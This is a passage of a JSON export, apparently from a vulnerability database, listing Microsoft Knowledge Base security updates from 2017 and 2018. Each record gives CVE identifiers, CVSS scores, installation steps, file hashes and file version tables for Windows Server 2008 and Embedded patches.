your local computer are displayed in your local time together with your current daylight saving time (DST) bias. 
Additionally, the dates and the times may change when you perform certain operations on the files.</span><br/><br/><strong>Windows XP</strong></p><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">x86 Windows XP</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td><td><strong class=\"sbody-strong\">SP requirement</strong></td><td><strong class=\"sbody-strong\">Service branch</strong></td></tr><tr><td>Kernel32.dll</td><td>5.1.2600.7593</td><td>993,792</td><td>06-Nov-2018</td><td>22:52</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Ntdll.dll</td><td>5.1.2600.7593</td><td>720,384</td><td>06-Nov-2018</td><td>22:52</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Ole32.dll</td><td>5.1.2600.7593</td><td>1,299,968</td><td>06-Nov-2018</td><td>06:52</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Oleaut32.dll</td><td>5.1.2600.7593</td><td>563,200</td><td>06-Nov-2018</td><td>22:52</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Rpcss.dll</td><td>5.1.2600.7593</td><td>404,480</td><td>06-Nov-2018</td><td>22:52</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Updspapi.dll</td><td>6.3.13.0</td><td>382,840</td><td>01-Feb-2018</td><td>21:28</td><td>x86</td><td>None</td><td>Not applicable</td></tr></tbody></table></td></tr></tbody></table></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, 
"privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-13T00:00:00", "type": "mskb", "title": "Description of the security update for the Windows COM elevation of privilege vulnerability in Windows Embedded POSReady 2009 and Windows Embedded Standard 2009: November 13, 2018", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0214", "CVE-2017-0213"], "modified": "2018-11-14T01:06:17", "id": "KB4466388", "href": "https://support.microsoft.com/en-us/help/4466388/", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T13:21:28", "description": "## Summary\n\nAn information disclosure vulnerability exists when the win32k component incorrectly provides kernel information. An attacker who successfully exploits the vulnerability could obtain information to further compromise the user\u2019s system. \n \nTo learn more about the vulnerability, go to [the Security Update Guide](<https://portal.msrc.microsoft.com>).\n\n## More Information\n\nImportant \n\n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. 
For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Get security updates automatically](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>). \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4019204>) website. \n\n\n## Deployment information\n\nFor deployment details for this security update, go to the following article in the Microsoft Knowledge Base: \n[Security update deployment information: May 9, 2017](<http://support.microsoft.com/en-us/help/20170509>)\n\n## More Information\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\nFile Information\n\nFile hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4019204-x64.msu| 6F7B323D9865D8B88CAEB3FC83A8BB74222AFC3F| E44B48BD9F07FA10CC183931D35E89828681A49DF52049AE0D28002337FB87FA \nWindows6.0-KB4019204-ia64.msu| D16A080F7214A81D09FE1781685E84B0E55BBC71| 30D201FE117DFE3924B9E5E4ECBCE2F0E3921E76DD69FFC889DB8F7B78076FC9 
\nWindows6.0-KB4019204-x86.msu| 8301605396E05D4B8E2EE38FCB3CD801AD019CCE| 61ED3DBC6DCA600139F6CA77D784B4C8EED77BC6762A1CE209A92642DBE7D23B \n \n \n**File information** \nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. \n \n**Windows Server 2008 file information**\n\n**Note:** The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\nFor all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nWin32k.sys| 6.0.6002.19778| 2,806,272| 28-Apr-2017| 01:59| x64 \nWin32k.sys| 6.0.6002.24095| 2,808,320| 28-Apr-2017| 02:45| x64 \n \nFor all supported ia64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nWin32k.sys| 6.0.6002.19778| 6,693,888| 28-Apr-2017| 01:45| IA-64 \nWin32k.sys| 6.0.6002.24095| 6,703,616| 28-Apr-2017| 02:21| IA-64 \n \nFor all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nWin32k.sys| 6.0.6002.19778| 2,074,112| 28-Apr-2017| 03:15| x86 \nWin32k.sys| 6.0.6002.24095| 2,082,304| 28-Apr-2017| 03:51| x86\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "Security update for the Windows win32k Information Disclosure Vulnerability in Windows Server 2008: May 9, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": 
"HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0263"], "modified": "2017-05-09T07:00:00", "id": "KB4019204", "href": "https://support.microsoft.com/en-us/help/4019204", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T13:19:35", "description": "## Summary\n\nA denial of service vulnerability exists in Windows DNS Server if the server is configured to answer version queries. An attacker who successfully exploits this vulnerability could cause the DNS Server service to become unresponsive. \nTo learn more about the vulnerability, go to [the Security Update Guide](<https://portal.msrc.microsoft.com>).\n\n## More Information\n\nImportant \n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Get security updates automatically](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>). 
\n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4018196>) website. \n\n\n## Deployment information\n\nFor deployment details for this security update, go to the following article in the Microsoft Knowledge Base: \n[Security update deployment information: May 9, 2017](<http://support.microsoft.com/en-us/help/20170509>)\n\n## More Information\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\nFile Information\n\nFile hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4018196-x64.msu| 9DE300553C1CD0DF9A0E3349DF3F1674D795E4FB| 95371DB51917AB23C180F37D82299845DF4754CFDF41A0F0FFD89B1E88A50069 \nWindows6.0-KB4018196-x86.msu| 6A937C9FA6CF63298282E7CC29BC8EB1EA226616| 3501B601B7FAA785844DD996CC5B4E6A2D10E5793F1AFAF01DA122189E297AEA \n \n \n**File information** \nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. 
\n \n**Windows Server 2008 file information** \n\n\n**Note:** The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\nFor all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nCache.dns| Not applicable| 3,179| 03-Sep-2008| 18:33| Not applicable \nDns.exe| 6.0.6002.19765| 640,000| 07-Apr-2017| 14:53| x64 \nDnsserver.events.xml| Not applicable| 609| 03-Sep-2008| 18:33| Not applicable \nCache.dns| Not applicable| 3,179| 07-Mar-2016| 23:34| Not applicable \nDns.exe| 6.0.6002.24089| 640,512| 07-Apr-2017| 14:53| x64 \nDnsserver.events.xml| Not applicable| 609| 07-Mar-2016| 23:34| Not applicable \n \nFor all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nCache.dns| Not applicable| 3,179| 16-Apr-2008| 00:31| Not applicable \nDns.exe| 6.0.6002.19765| 510,976| 07-Apr-2017| 14:27| x86 \nDnsserver.events.xml| Not applicable| 609| 16-Apr-2008| 00:31| Not applicable \nCache.dns| Not applicable| 3,179| 07-Mar-2016| 23:35| Not applicable \nDns.exe| 6.0.6002.24089| 511,488| 07-Apr-2017| 14:30| x86 \nDnsserver.events.xml| Not applicable| 609| 07-Mar-2016| 23:35| Not applicable\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "Security update for the Windows DNS Server Denial of Service Vulnerability in Microsoft Windows Server 2008: May 9, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", 
"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0171"], "modified": "2017-05-09T07:00:00", "id": "KB4018196", "href": "https://support.microsoft.com/en-us/help/4018196", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-10T13:20:38", "description": "## Summary\n\nAn information disclosure vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploits this vulnerability could craft a special packet. This could cause an information disclosure from the server. \n \nTo learn more about the vulnerability, go to [the Security Update Guide](<https://portal.msrc.microsoft.com>).\n\n## More Information\n\nImportant \n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Get security updates automatically](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>). 
\n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4018466>) website. \n\n\n## Deployment information\n\nFor deployment details for this security update, go to the following article in the Microsoft Knowledge Base: \n[Security update deployment information: May 9, 2017](<http://support.microsoft.com/en-us/help/20170509>)\n\n## More Information\n\n## \n\n__\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\nFile Information\n\n## \n\n__\n\nFile hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4018466-ia64.msu| C3F75846826AD3992FBC2D7A8C57A85F7F0A397C| 38D980BA623A0AD5695DB70F6CA0B49A9A1069EE304DCF1FF4F4411823EBC0C7 \nWindows6.0-KB4018466-x64.msu| 716403222008343DAD1A9964E1C45787E51A8792| 5DF45753B06958D0DA1FE1E4DF6C74A504D0BA23E5FE005A09DBDA07D18CB448 \nWindows6.0-KB4018466-x86.msu| 33843FD20FDD7D88A77C6AC5BA02145641EDE966| FBC2257442A6ED0351FB677F93A8FB71A2C2BD64B73D23F63D7668D1440D760A \n \n \n**File information** \nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. 
\n \n**Windows Server 2008 file information** \n\n\n**Note: **The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n## \n\n__\n\nFor all supported ia64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nNetevent.dll.mui| 6.0.6002.19673| 270,336| 03-Aug-2016| 16:57| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 230,912| 03-Aug-2016| 15:36| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 270,848| 03-Aug-2016| 17:01| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 144,384| 03-Aug-2016| 16:49| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 137,216| 03-Aug-2016| 17:04| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 99,840| 03-Aug-2016| 17:00| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 101,376| 03-Aug-2016| 16:55| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 270,336| 07-Apr-2017| 16:51| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 230,912| 07-Apr-2017| 15:22| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 270,848| 07-Apr-2017| 16:42| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 144,384| 07-Apr-2017| 16:54| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 137,216| 07-Apr-2017| 16:49| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 99,840| 07-Apr-2017| 16:53| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 101,376| 07-Apr-2017| 16:45| Not applicable \nNetevent.dll| 6.0.6002.19673| 17,920| 03-Aug-2016| 15:35| IA-64 \nNetevent.dll| 6.0.6002.24089| 17,920| 07-Apr-2017| 15:17| IA-64 \nSrvnet.sys| 6.0.6002.19673| 297,984| 03-Aug-2016| 14:20| IA-64 \nSrvnet.sys| 6.0.6002.24089| 297,984| 07-Apr-2017| 14:21| IA-64 \nSrv.sys| 6.0.6002.19765| 967,168| 07-Apr-2017| 14:21| IA-64 \nSrv.sys| 6.0.6002.24089| 969,216| 07-Apr-2017| 14:22| IA-64 \nSrv2.sys| 6.0.6002.19765| 468,480| 07-Apr-2017| 14:21| IA-64 \nSrv2.sys| 6.0.6002.24089| 474,624| 07-Apr-2017| 14:21| IA-64 \nNetevent.dll.mui| 6.0.6002.19673| 278,528| 
03-Aug-2016| 16:20| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 241,664| 03-Aug-2016| 15:44| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 278,528| 03-Aug-2016| 16:19| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 155,648| 03-Aug-2016| 16:38| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 147,456| 03-Aug-2016| 16:31| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 110,592| 03-Aug-2016| 16:39| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 110,592| 03-Aug-2016| 16:27| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 278,528| 07-Apr-2017| 16:20| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 241,664| 07-Apr-2017| 15:26| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 278,528| 07-Apr-2017| 16:35| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 155,648| 07-Apr-2017| 16:34| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 147,456| 07-Apr-2017| 16:25| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 110,592| 07-Apr-2017| 16:38| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 110,592| 07-Apr-2017| 16:33| Not applicable \nNetevent.dll| 6.0.6002.19673| 17,920| 03-Aug-2016| 15:45| x86 \nNetevent.dll| 6.0.6002.24089| 17,920| 07-Apr-2017| 15:24| x86 \n \n## \n\n__\n\nFor all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nNetevent.dll.mui| 6.0.6002.19673| 233,984| 03-Aug-2016| 17:08| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 239,104| 03-Aug-2016| 17:08| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 270,336| 03-Aug-2016| 17:06| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 289,792| 03-Aug-2016| 17:03| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 230,912| 03-Aug-2016| 16:23| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 263,168| 03-Aug-2016| 17:04| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 229,376| 03-Aug-2016| 17:05| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 270,848| 03-Aug-2016| 17:08| Not 
applicable \nNetevent.dll.mui| 6.0.6002.19673| 253,440| 03-Aug-2016| 17:10| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 262,144| 03-Aug-2016| 17:11| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 144,384| 03-Aug-2016| 17:15| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 137,216| 03-Aug-2016| 17:07| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 229,376| 03-Aug-2016| 17:16| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 253,952| 03-Aug-2016| 17:09| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 248,320| 03-Aug-2016| 17:02| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 253,440| 03-Aug-2016| 17:09| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 261,120| 03-Aug-2016| 17:12| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 241,152| 03-Aug-2016| 17:11| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 231,936| 03-Aug-2016| 17:10| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 230,912| 03-Aug-2016| 17:12| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 99,840| 03-Aug-2016| 17:08| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 101,376| 03-Aug-2016| 17:12| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 233,984| 07-Apr-2017| 16:47| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 239,104| 07-Apr-2017| 16:47| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 270,336| 07-Apr-2017| 16:55| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 289,792| 07-Apr-2017| 16:56| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 230,912| 07-Apr-2017| 15:45| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 263,168| 07-Apr-2017| 16:58| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 229,376| 07-Apr-2017| 16:56| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 270,848| 07-Apr-2017| 16:47| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 253,440| 07-Apr-2017| 16:49| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 262,144| 07-Apr-2017| 17:02| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 144,384| 07-Apr-2017| 17:01| Not 
applicable \nNetevent.dll.mui| 6.0.6002.24089| 137,216| 07-Apr-2017| 16:53| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 229,376| 07-Apr-2017| 17:01| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 253,952| 07-Apr-2017| 17:01| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 248,320| 07-Apr-2017| 16:48| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 253,440| 07-Apr-2017| 16:56| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 261,120| 07-Apr-2017| 16:58| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 241,152| 07-Apr-2017| 16:55| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 231,936| 07-Apr-2017| 16:55| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 230,912| 07-Apr-2017| 16:57| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 99,840| 07-Apr-2017| 16:52| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 101,376| 07-Apr-2017| 16:53| Not applicable \nNetevent.dll| 6.0.6002.19673| 17,920| 03-Aug-2016| 16:23| x64 \nNetevent.dll| 6.0.6002.24089| 17,920| 07-Apr-2017| 15:43| x64 \nSrvnet.sys| 6.0.6002.19673| 147,456| 03-Aug-2016| 14:40| x64 \nSrvnet.sys| 6.0.6002.24089| 147,968| 07-Apr-2017| 14:42| x64 \nSrv.sys| 6.0.6002.19765| 446,464| 07-Apr-2017| 14:43| x64 \nSrv.sys| 6.0.6002.24089| 445,440| 07-Apr-2017| 14:42| x64 \nSrv2.sys| 6.0.6002.19765| 176,128| 07-Apr-2017| 14:42| x64 \nSrv2.sys| 6.0.6002.24089| 178,176| 07-Apr-2017| 14:42| x64 \nNetevent.dll.mui| 6.0.6002.19673| 241,664| 03-Aug-2016| 16:22| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 249,856| 03-Aug-2016| 16:21| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 278,528| 03-Aug-2016| 16:20| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 299,008| 03-Aug-2016| 16:28| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 241,664| 03-Aug-2016| 15:44| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 274,432| 03-Aug-2016| 16:19| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 237,568| 03-Aug-2016| 16:29| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 278,528| 
03-Aug-2016| 16:19| Not applicable\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "Security update for the Windows SMB Information Disclosure Vulnerability in Windows Server 2008: May 9, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0269"], "modified": "2017-05-09T07:00:00", "id": "KB4018466", "href": "https://support.microsoft.com/en-us/help/4018466", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-12-31T14:39:42", "description": "## Summary\n\nAn information disclosure vulnerability exists in the way that some ActiveX objects are instantiated. An attacker who successfully exploits this vulnerability could gain access to protected memory contents. \n \nTo learn more about the vulnerability, go to [CVE-2017-0242](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2017-0242>).\n\n## More Information\n\nImportant \n\n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Get security updates automatically](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>). \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4018927>) website. 
\n\n\n## Deployment information\n\nFor deployment details for this security update, go to the following article in the Microsoft Knowledge Base: \n[Security update deployment information: May 9, 2017](<http://support.microsoft.com/en-us/help/20170509>)\n\n## More Information\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\nFile Information\n\nFile hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4018927-ia64.msu| 27D474F44AD7A45969BA4BBBBF53349EF0DD1AC7| DAF22C0C2096613454CB0360D85974BB3F87B4BC2B8E184C50553DC52CE1E9DB \nWindows6.0-KB4018927-x64.msu| 5EA789D60FE935C4CBBB9A8BDEB3B05E51E3928B| AE0CFFDD08F172905419A7F85BC05CB1E17E6A9E1C7ACEF768CC280F72EEC2A6 \nWindows6.0-KB4018927-x86.msu| 20E9C85C9802777CF36FEE0FDDA32A3C00C37A30| F1264F281A8B9BFC9B2C100F55911B119CBD72F72C5BC554E0466DCEA03673EB \n \n \n**File information** \nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. 
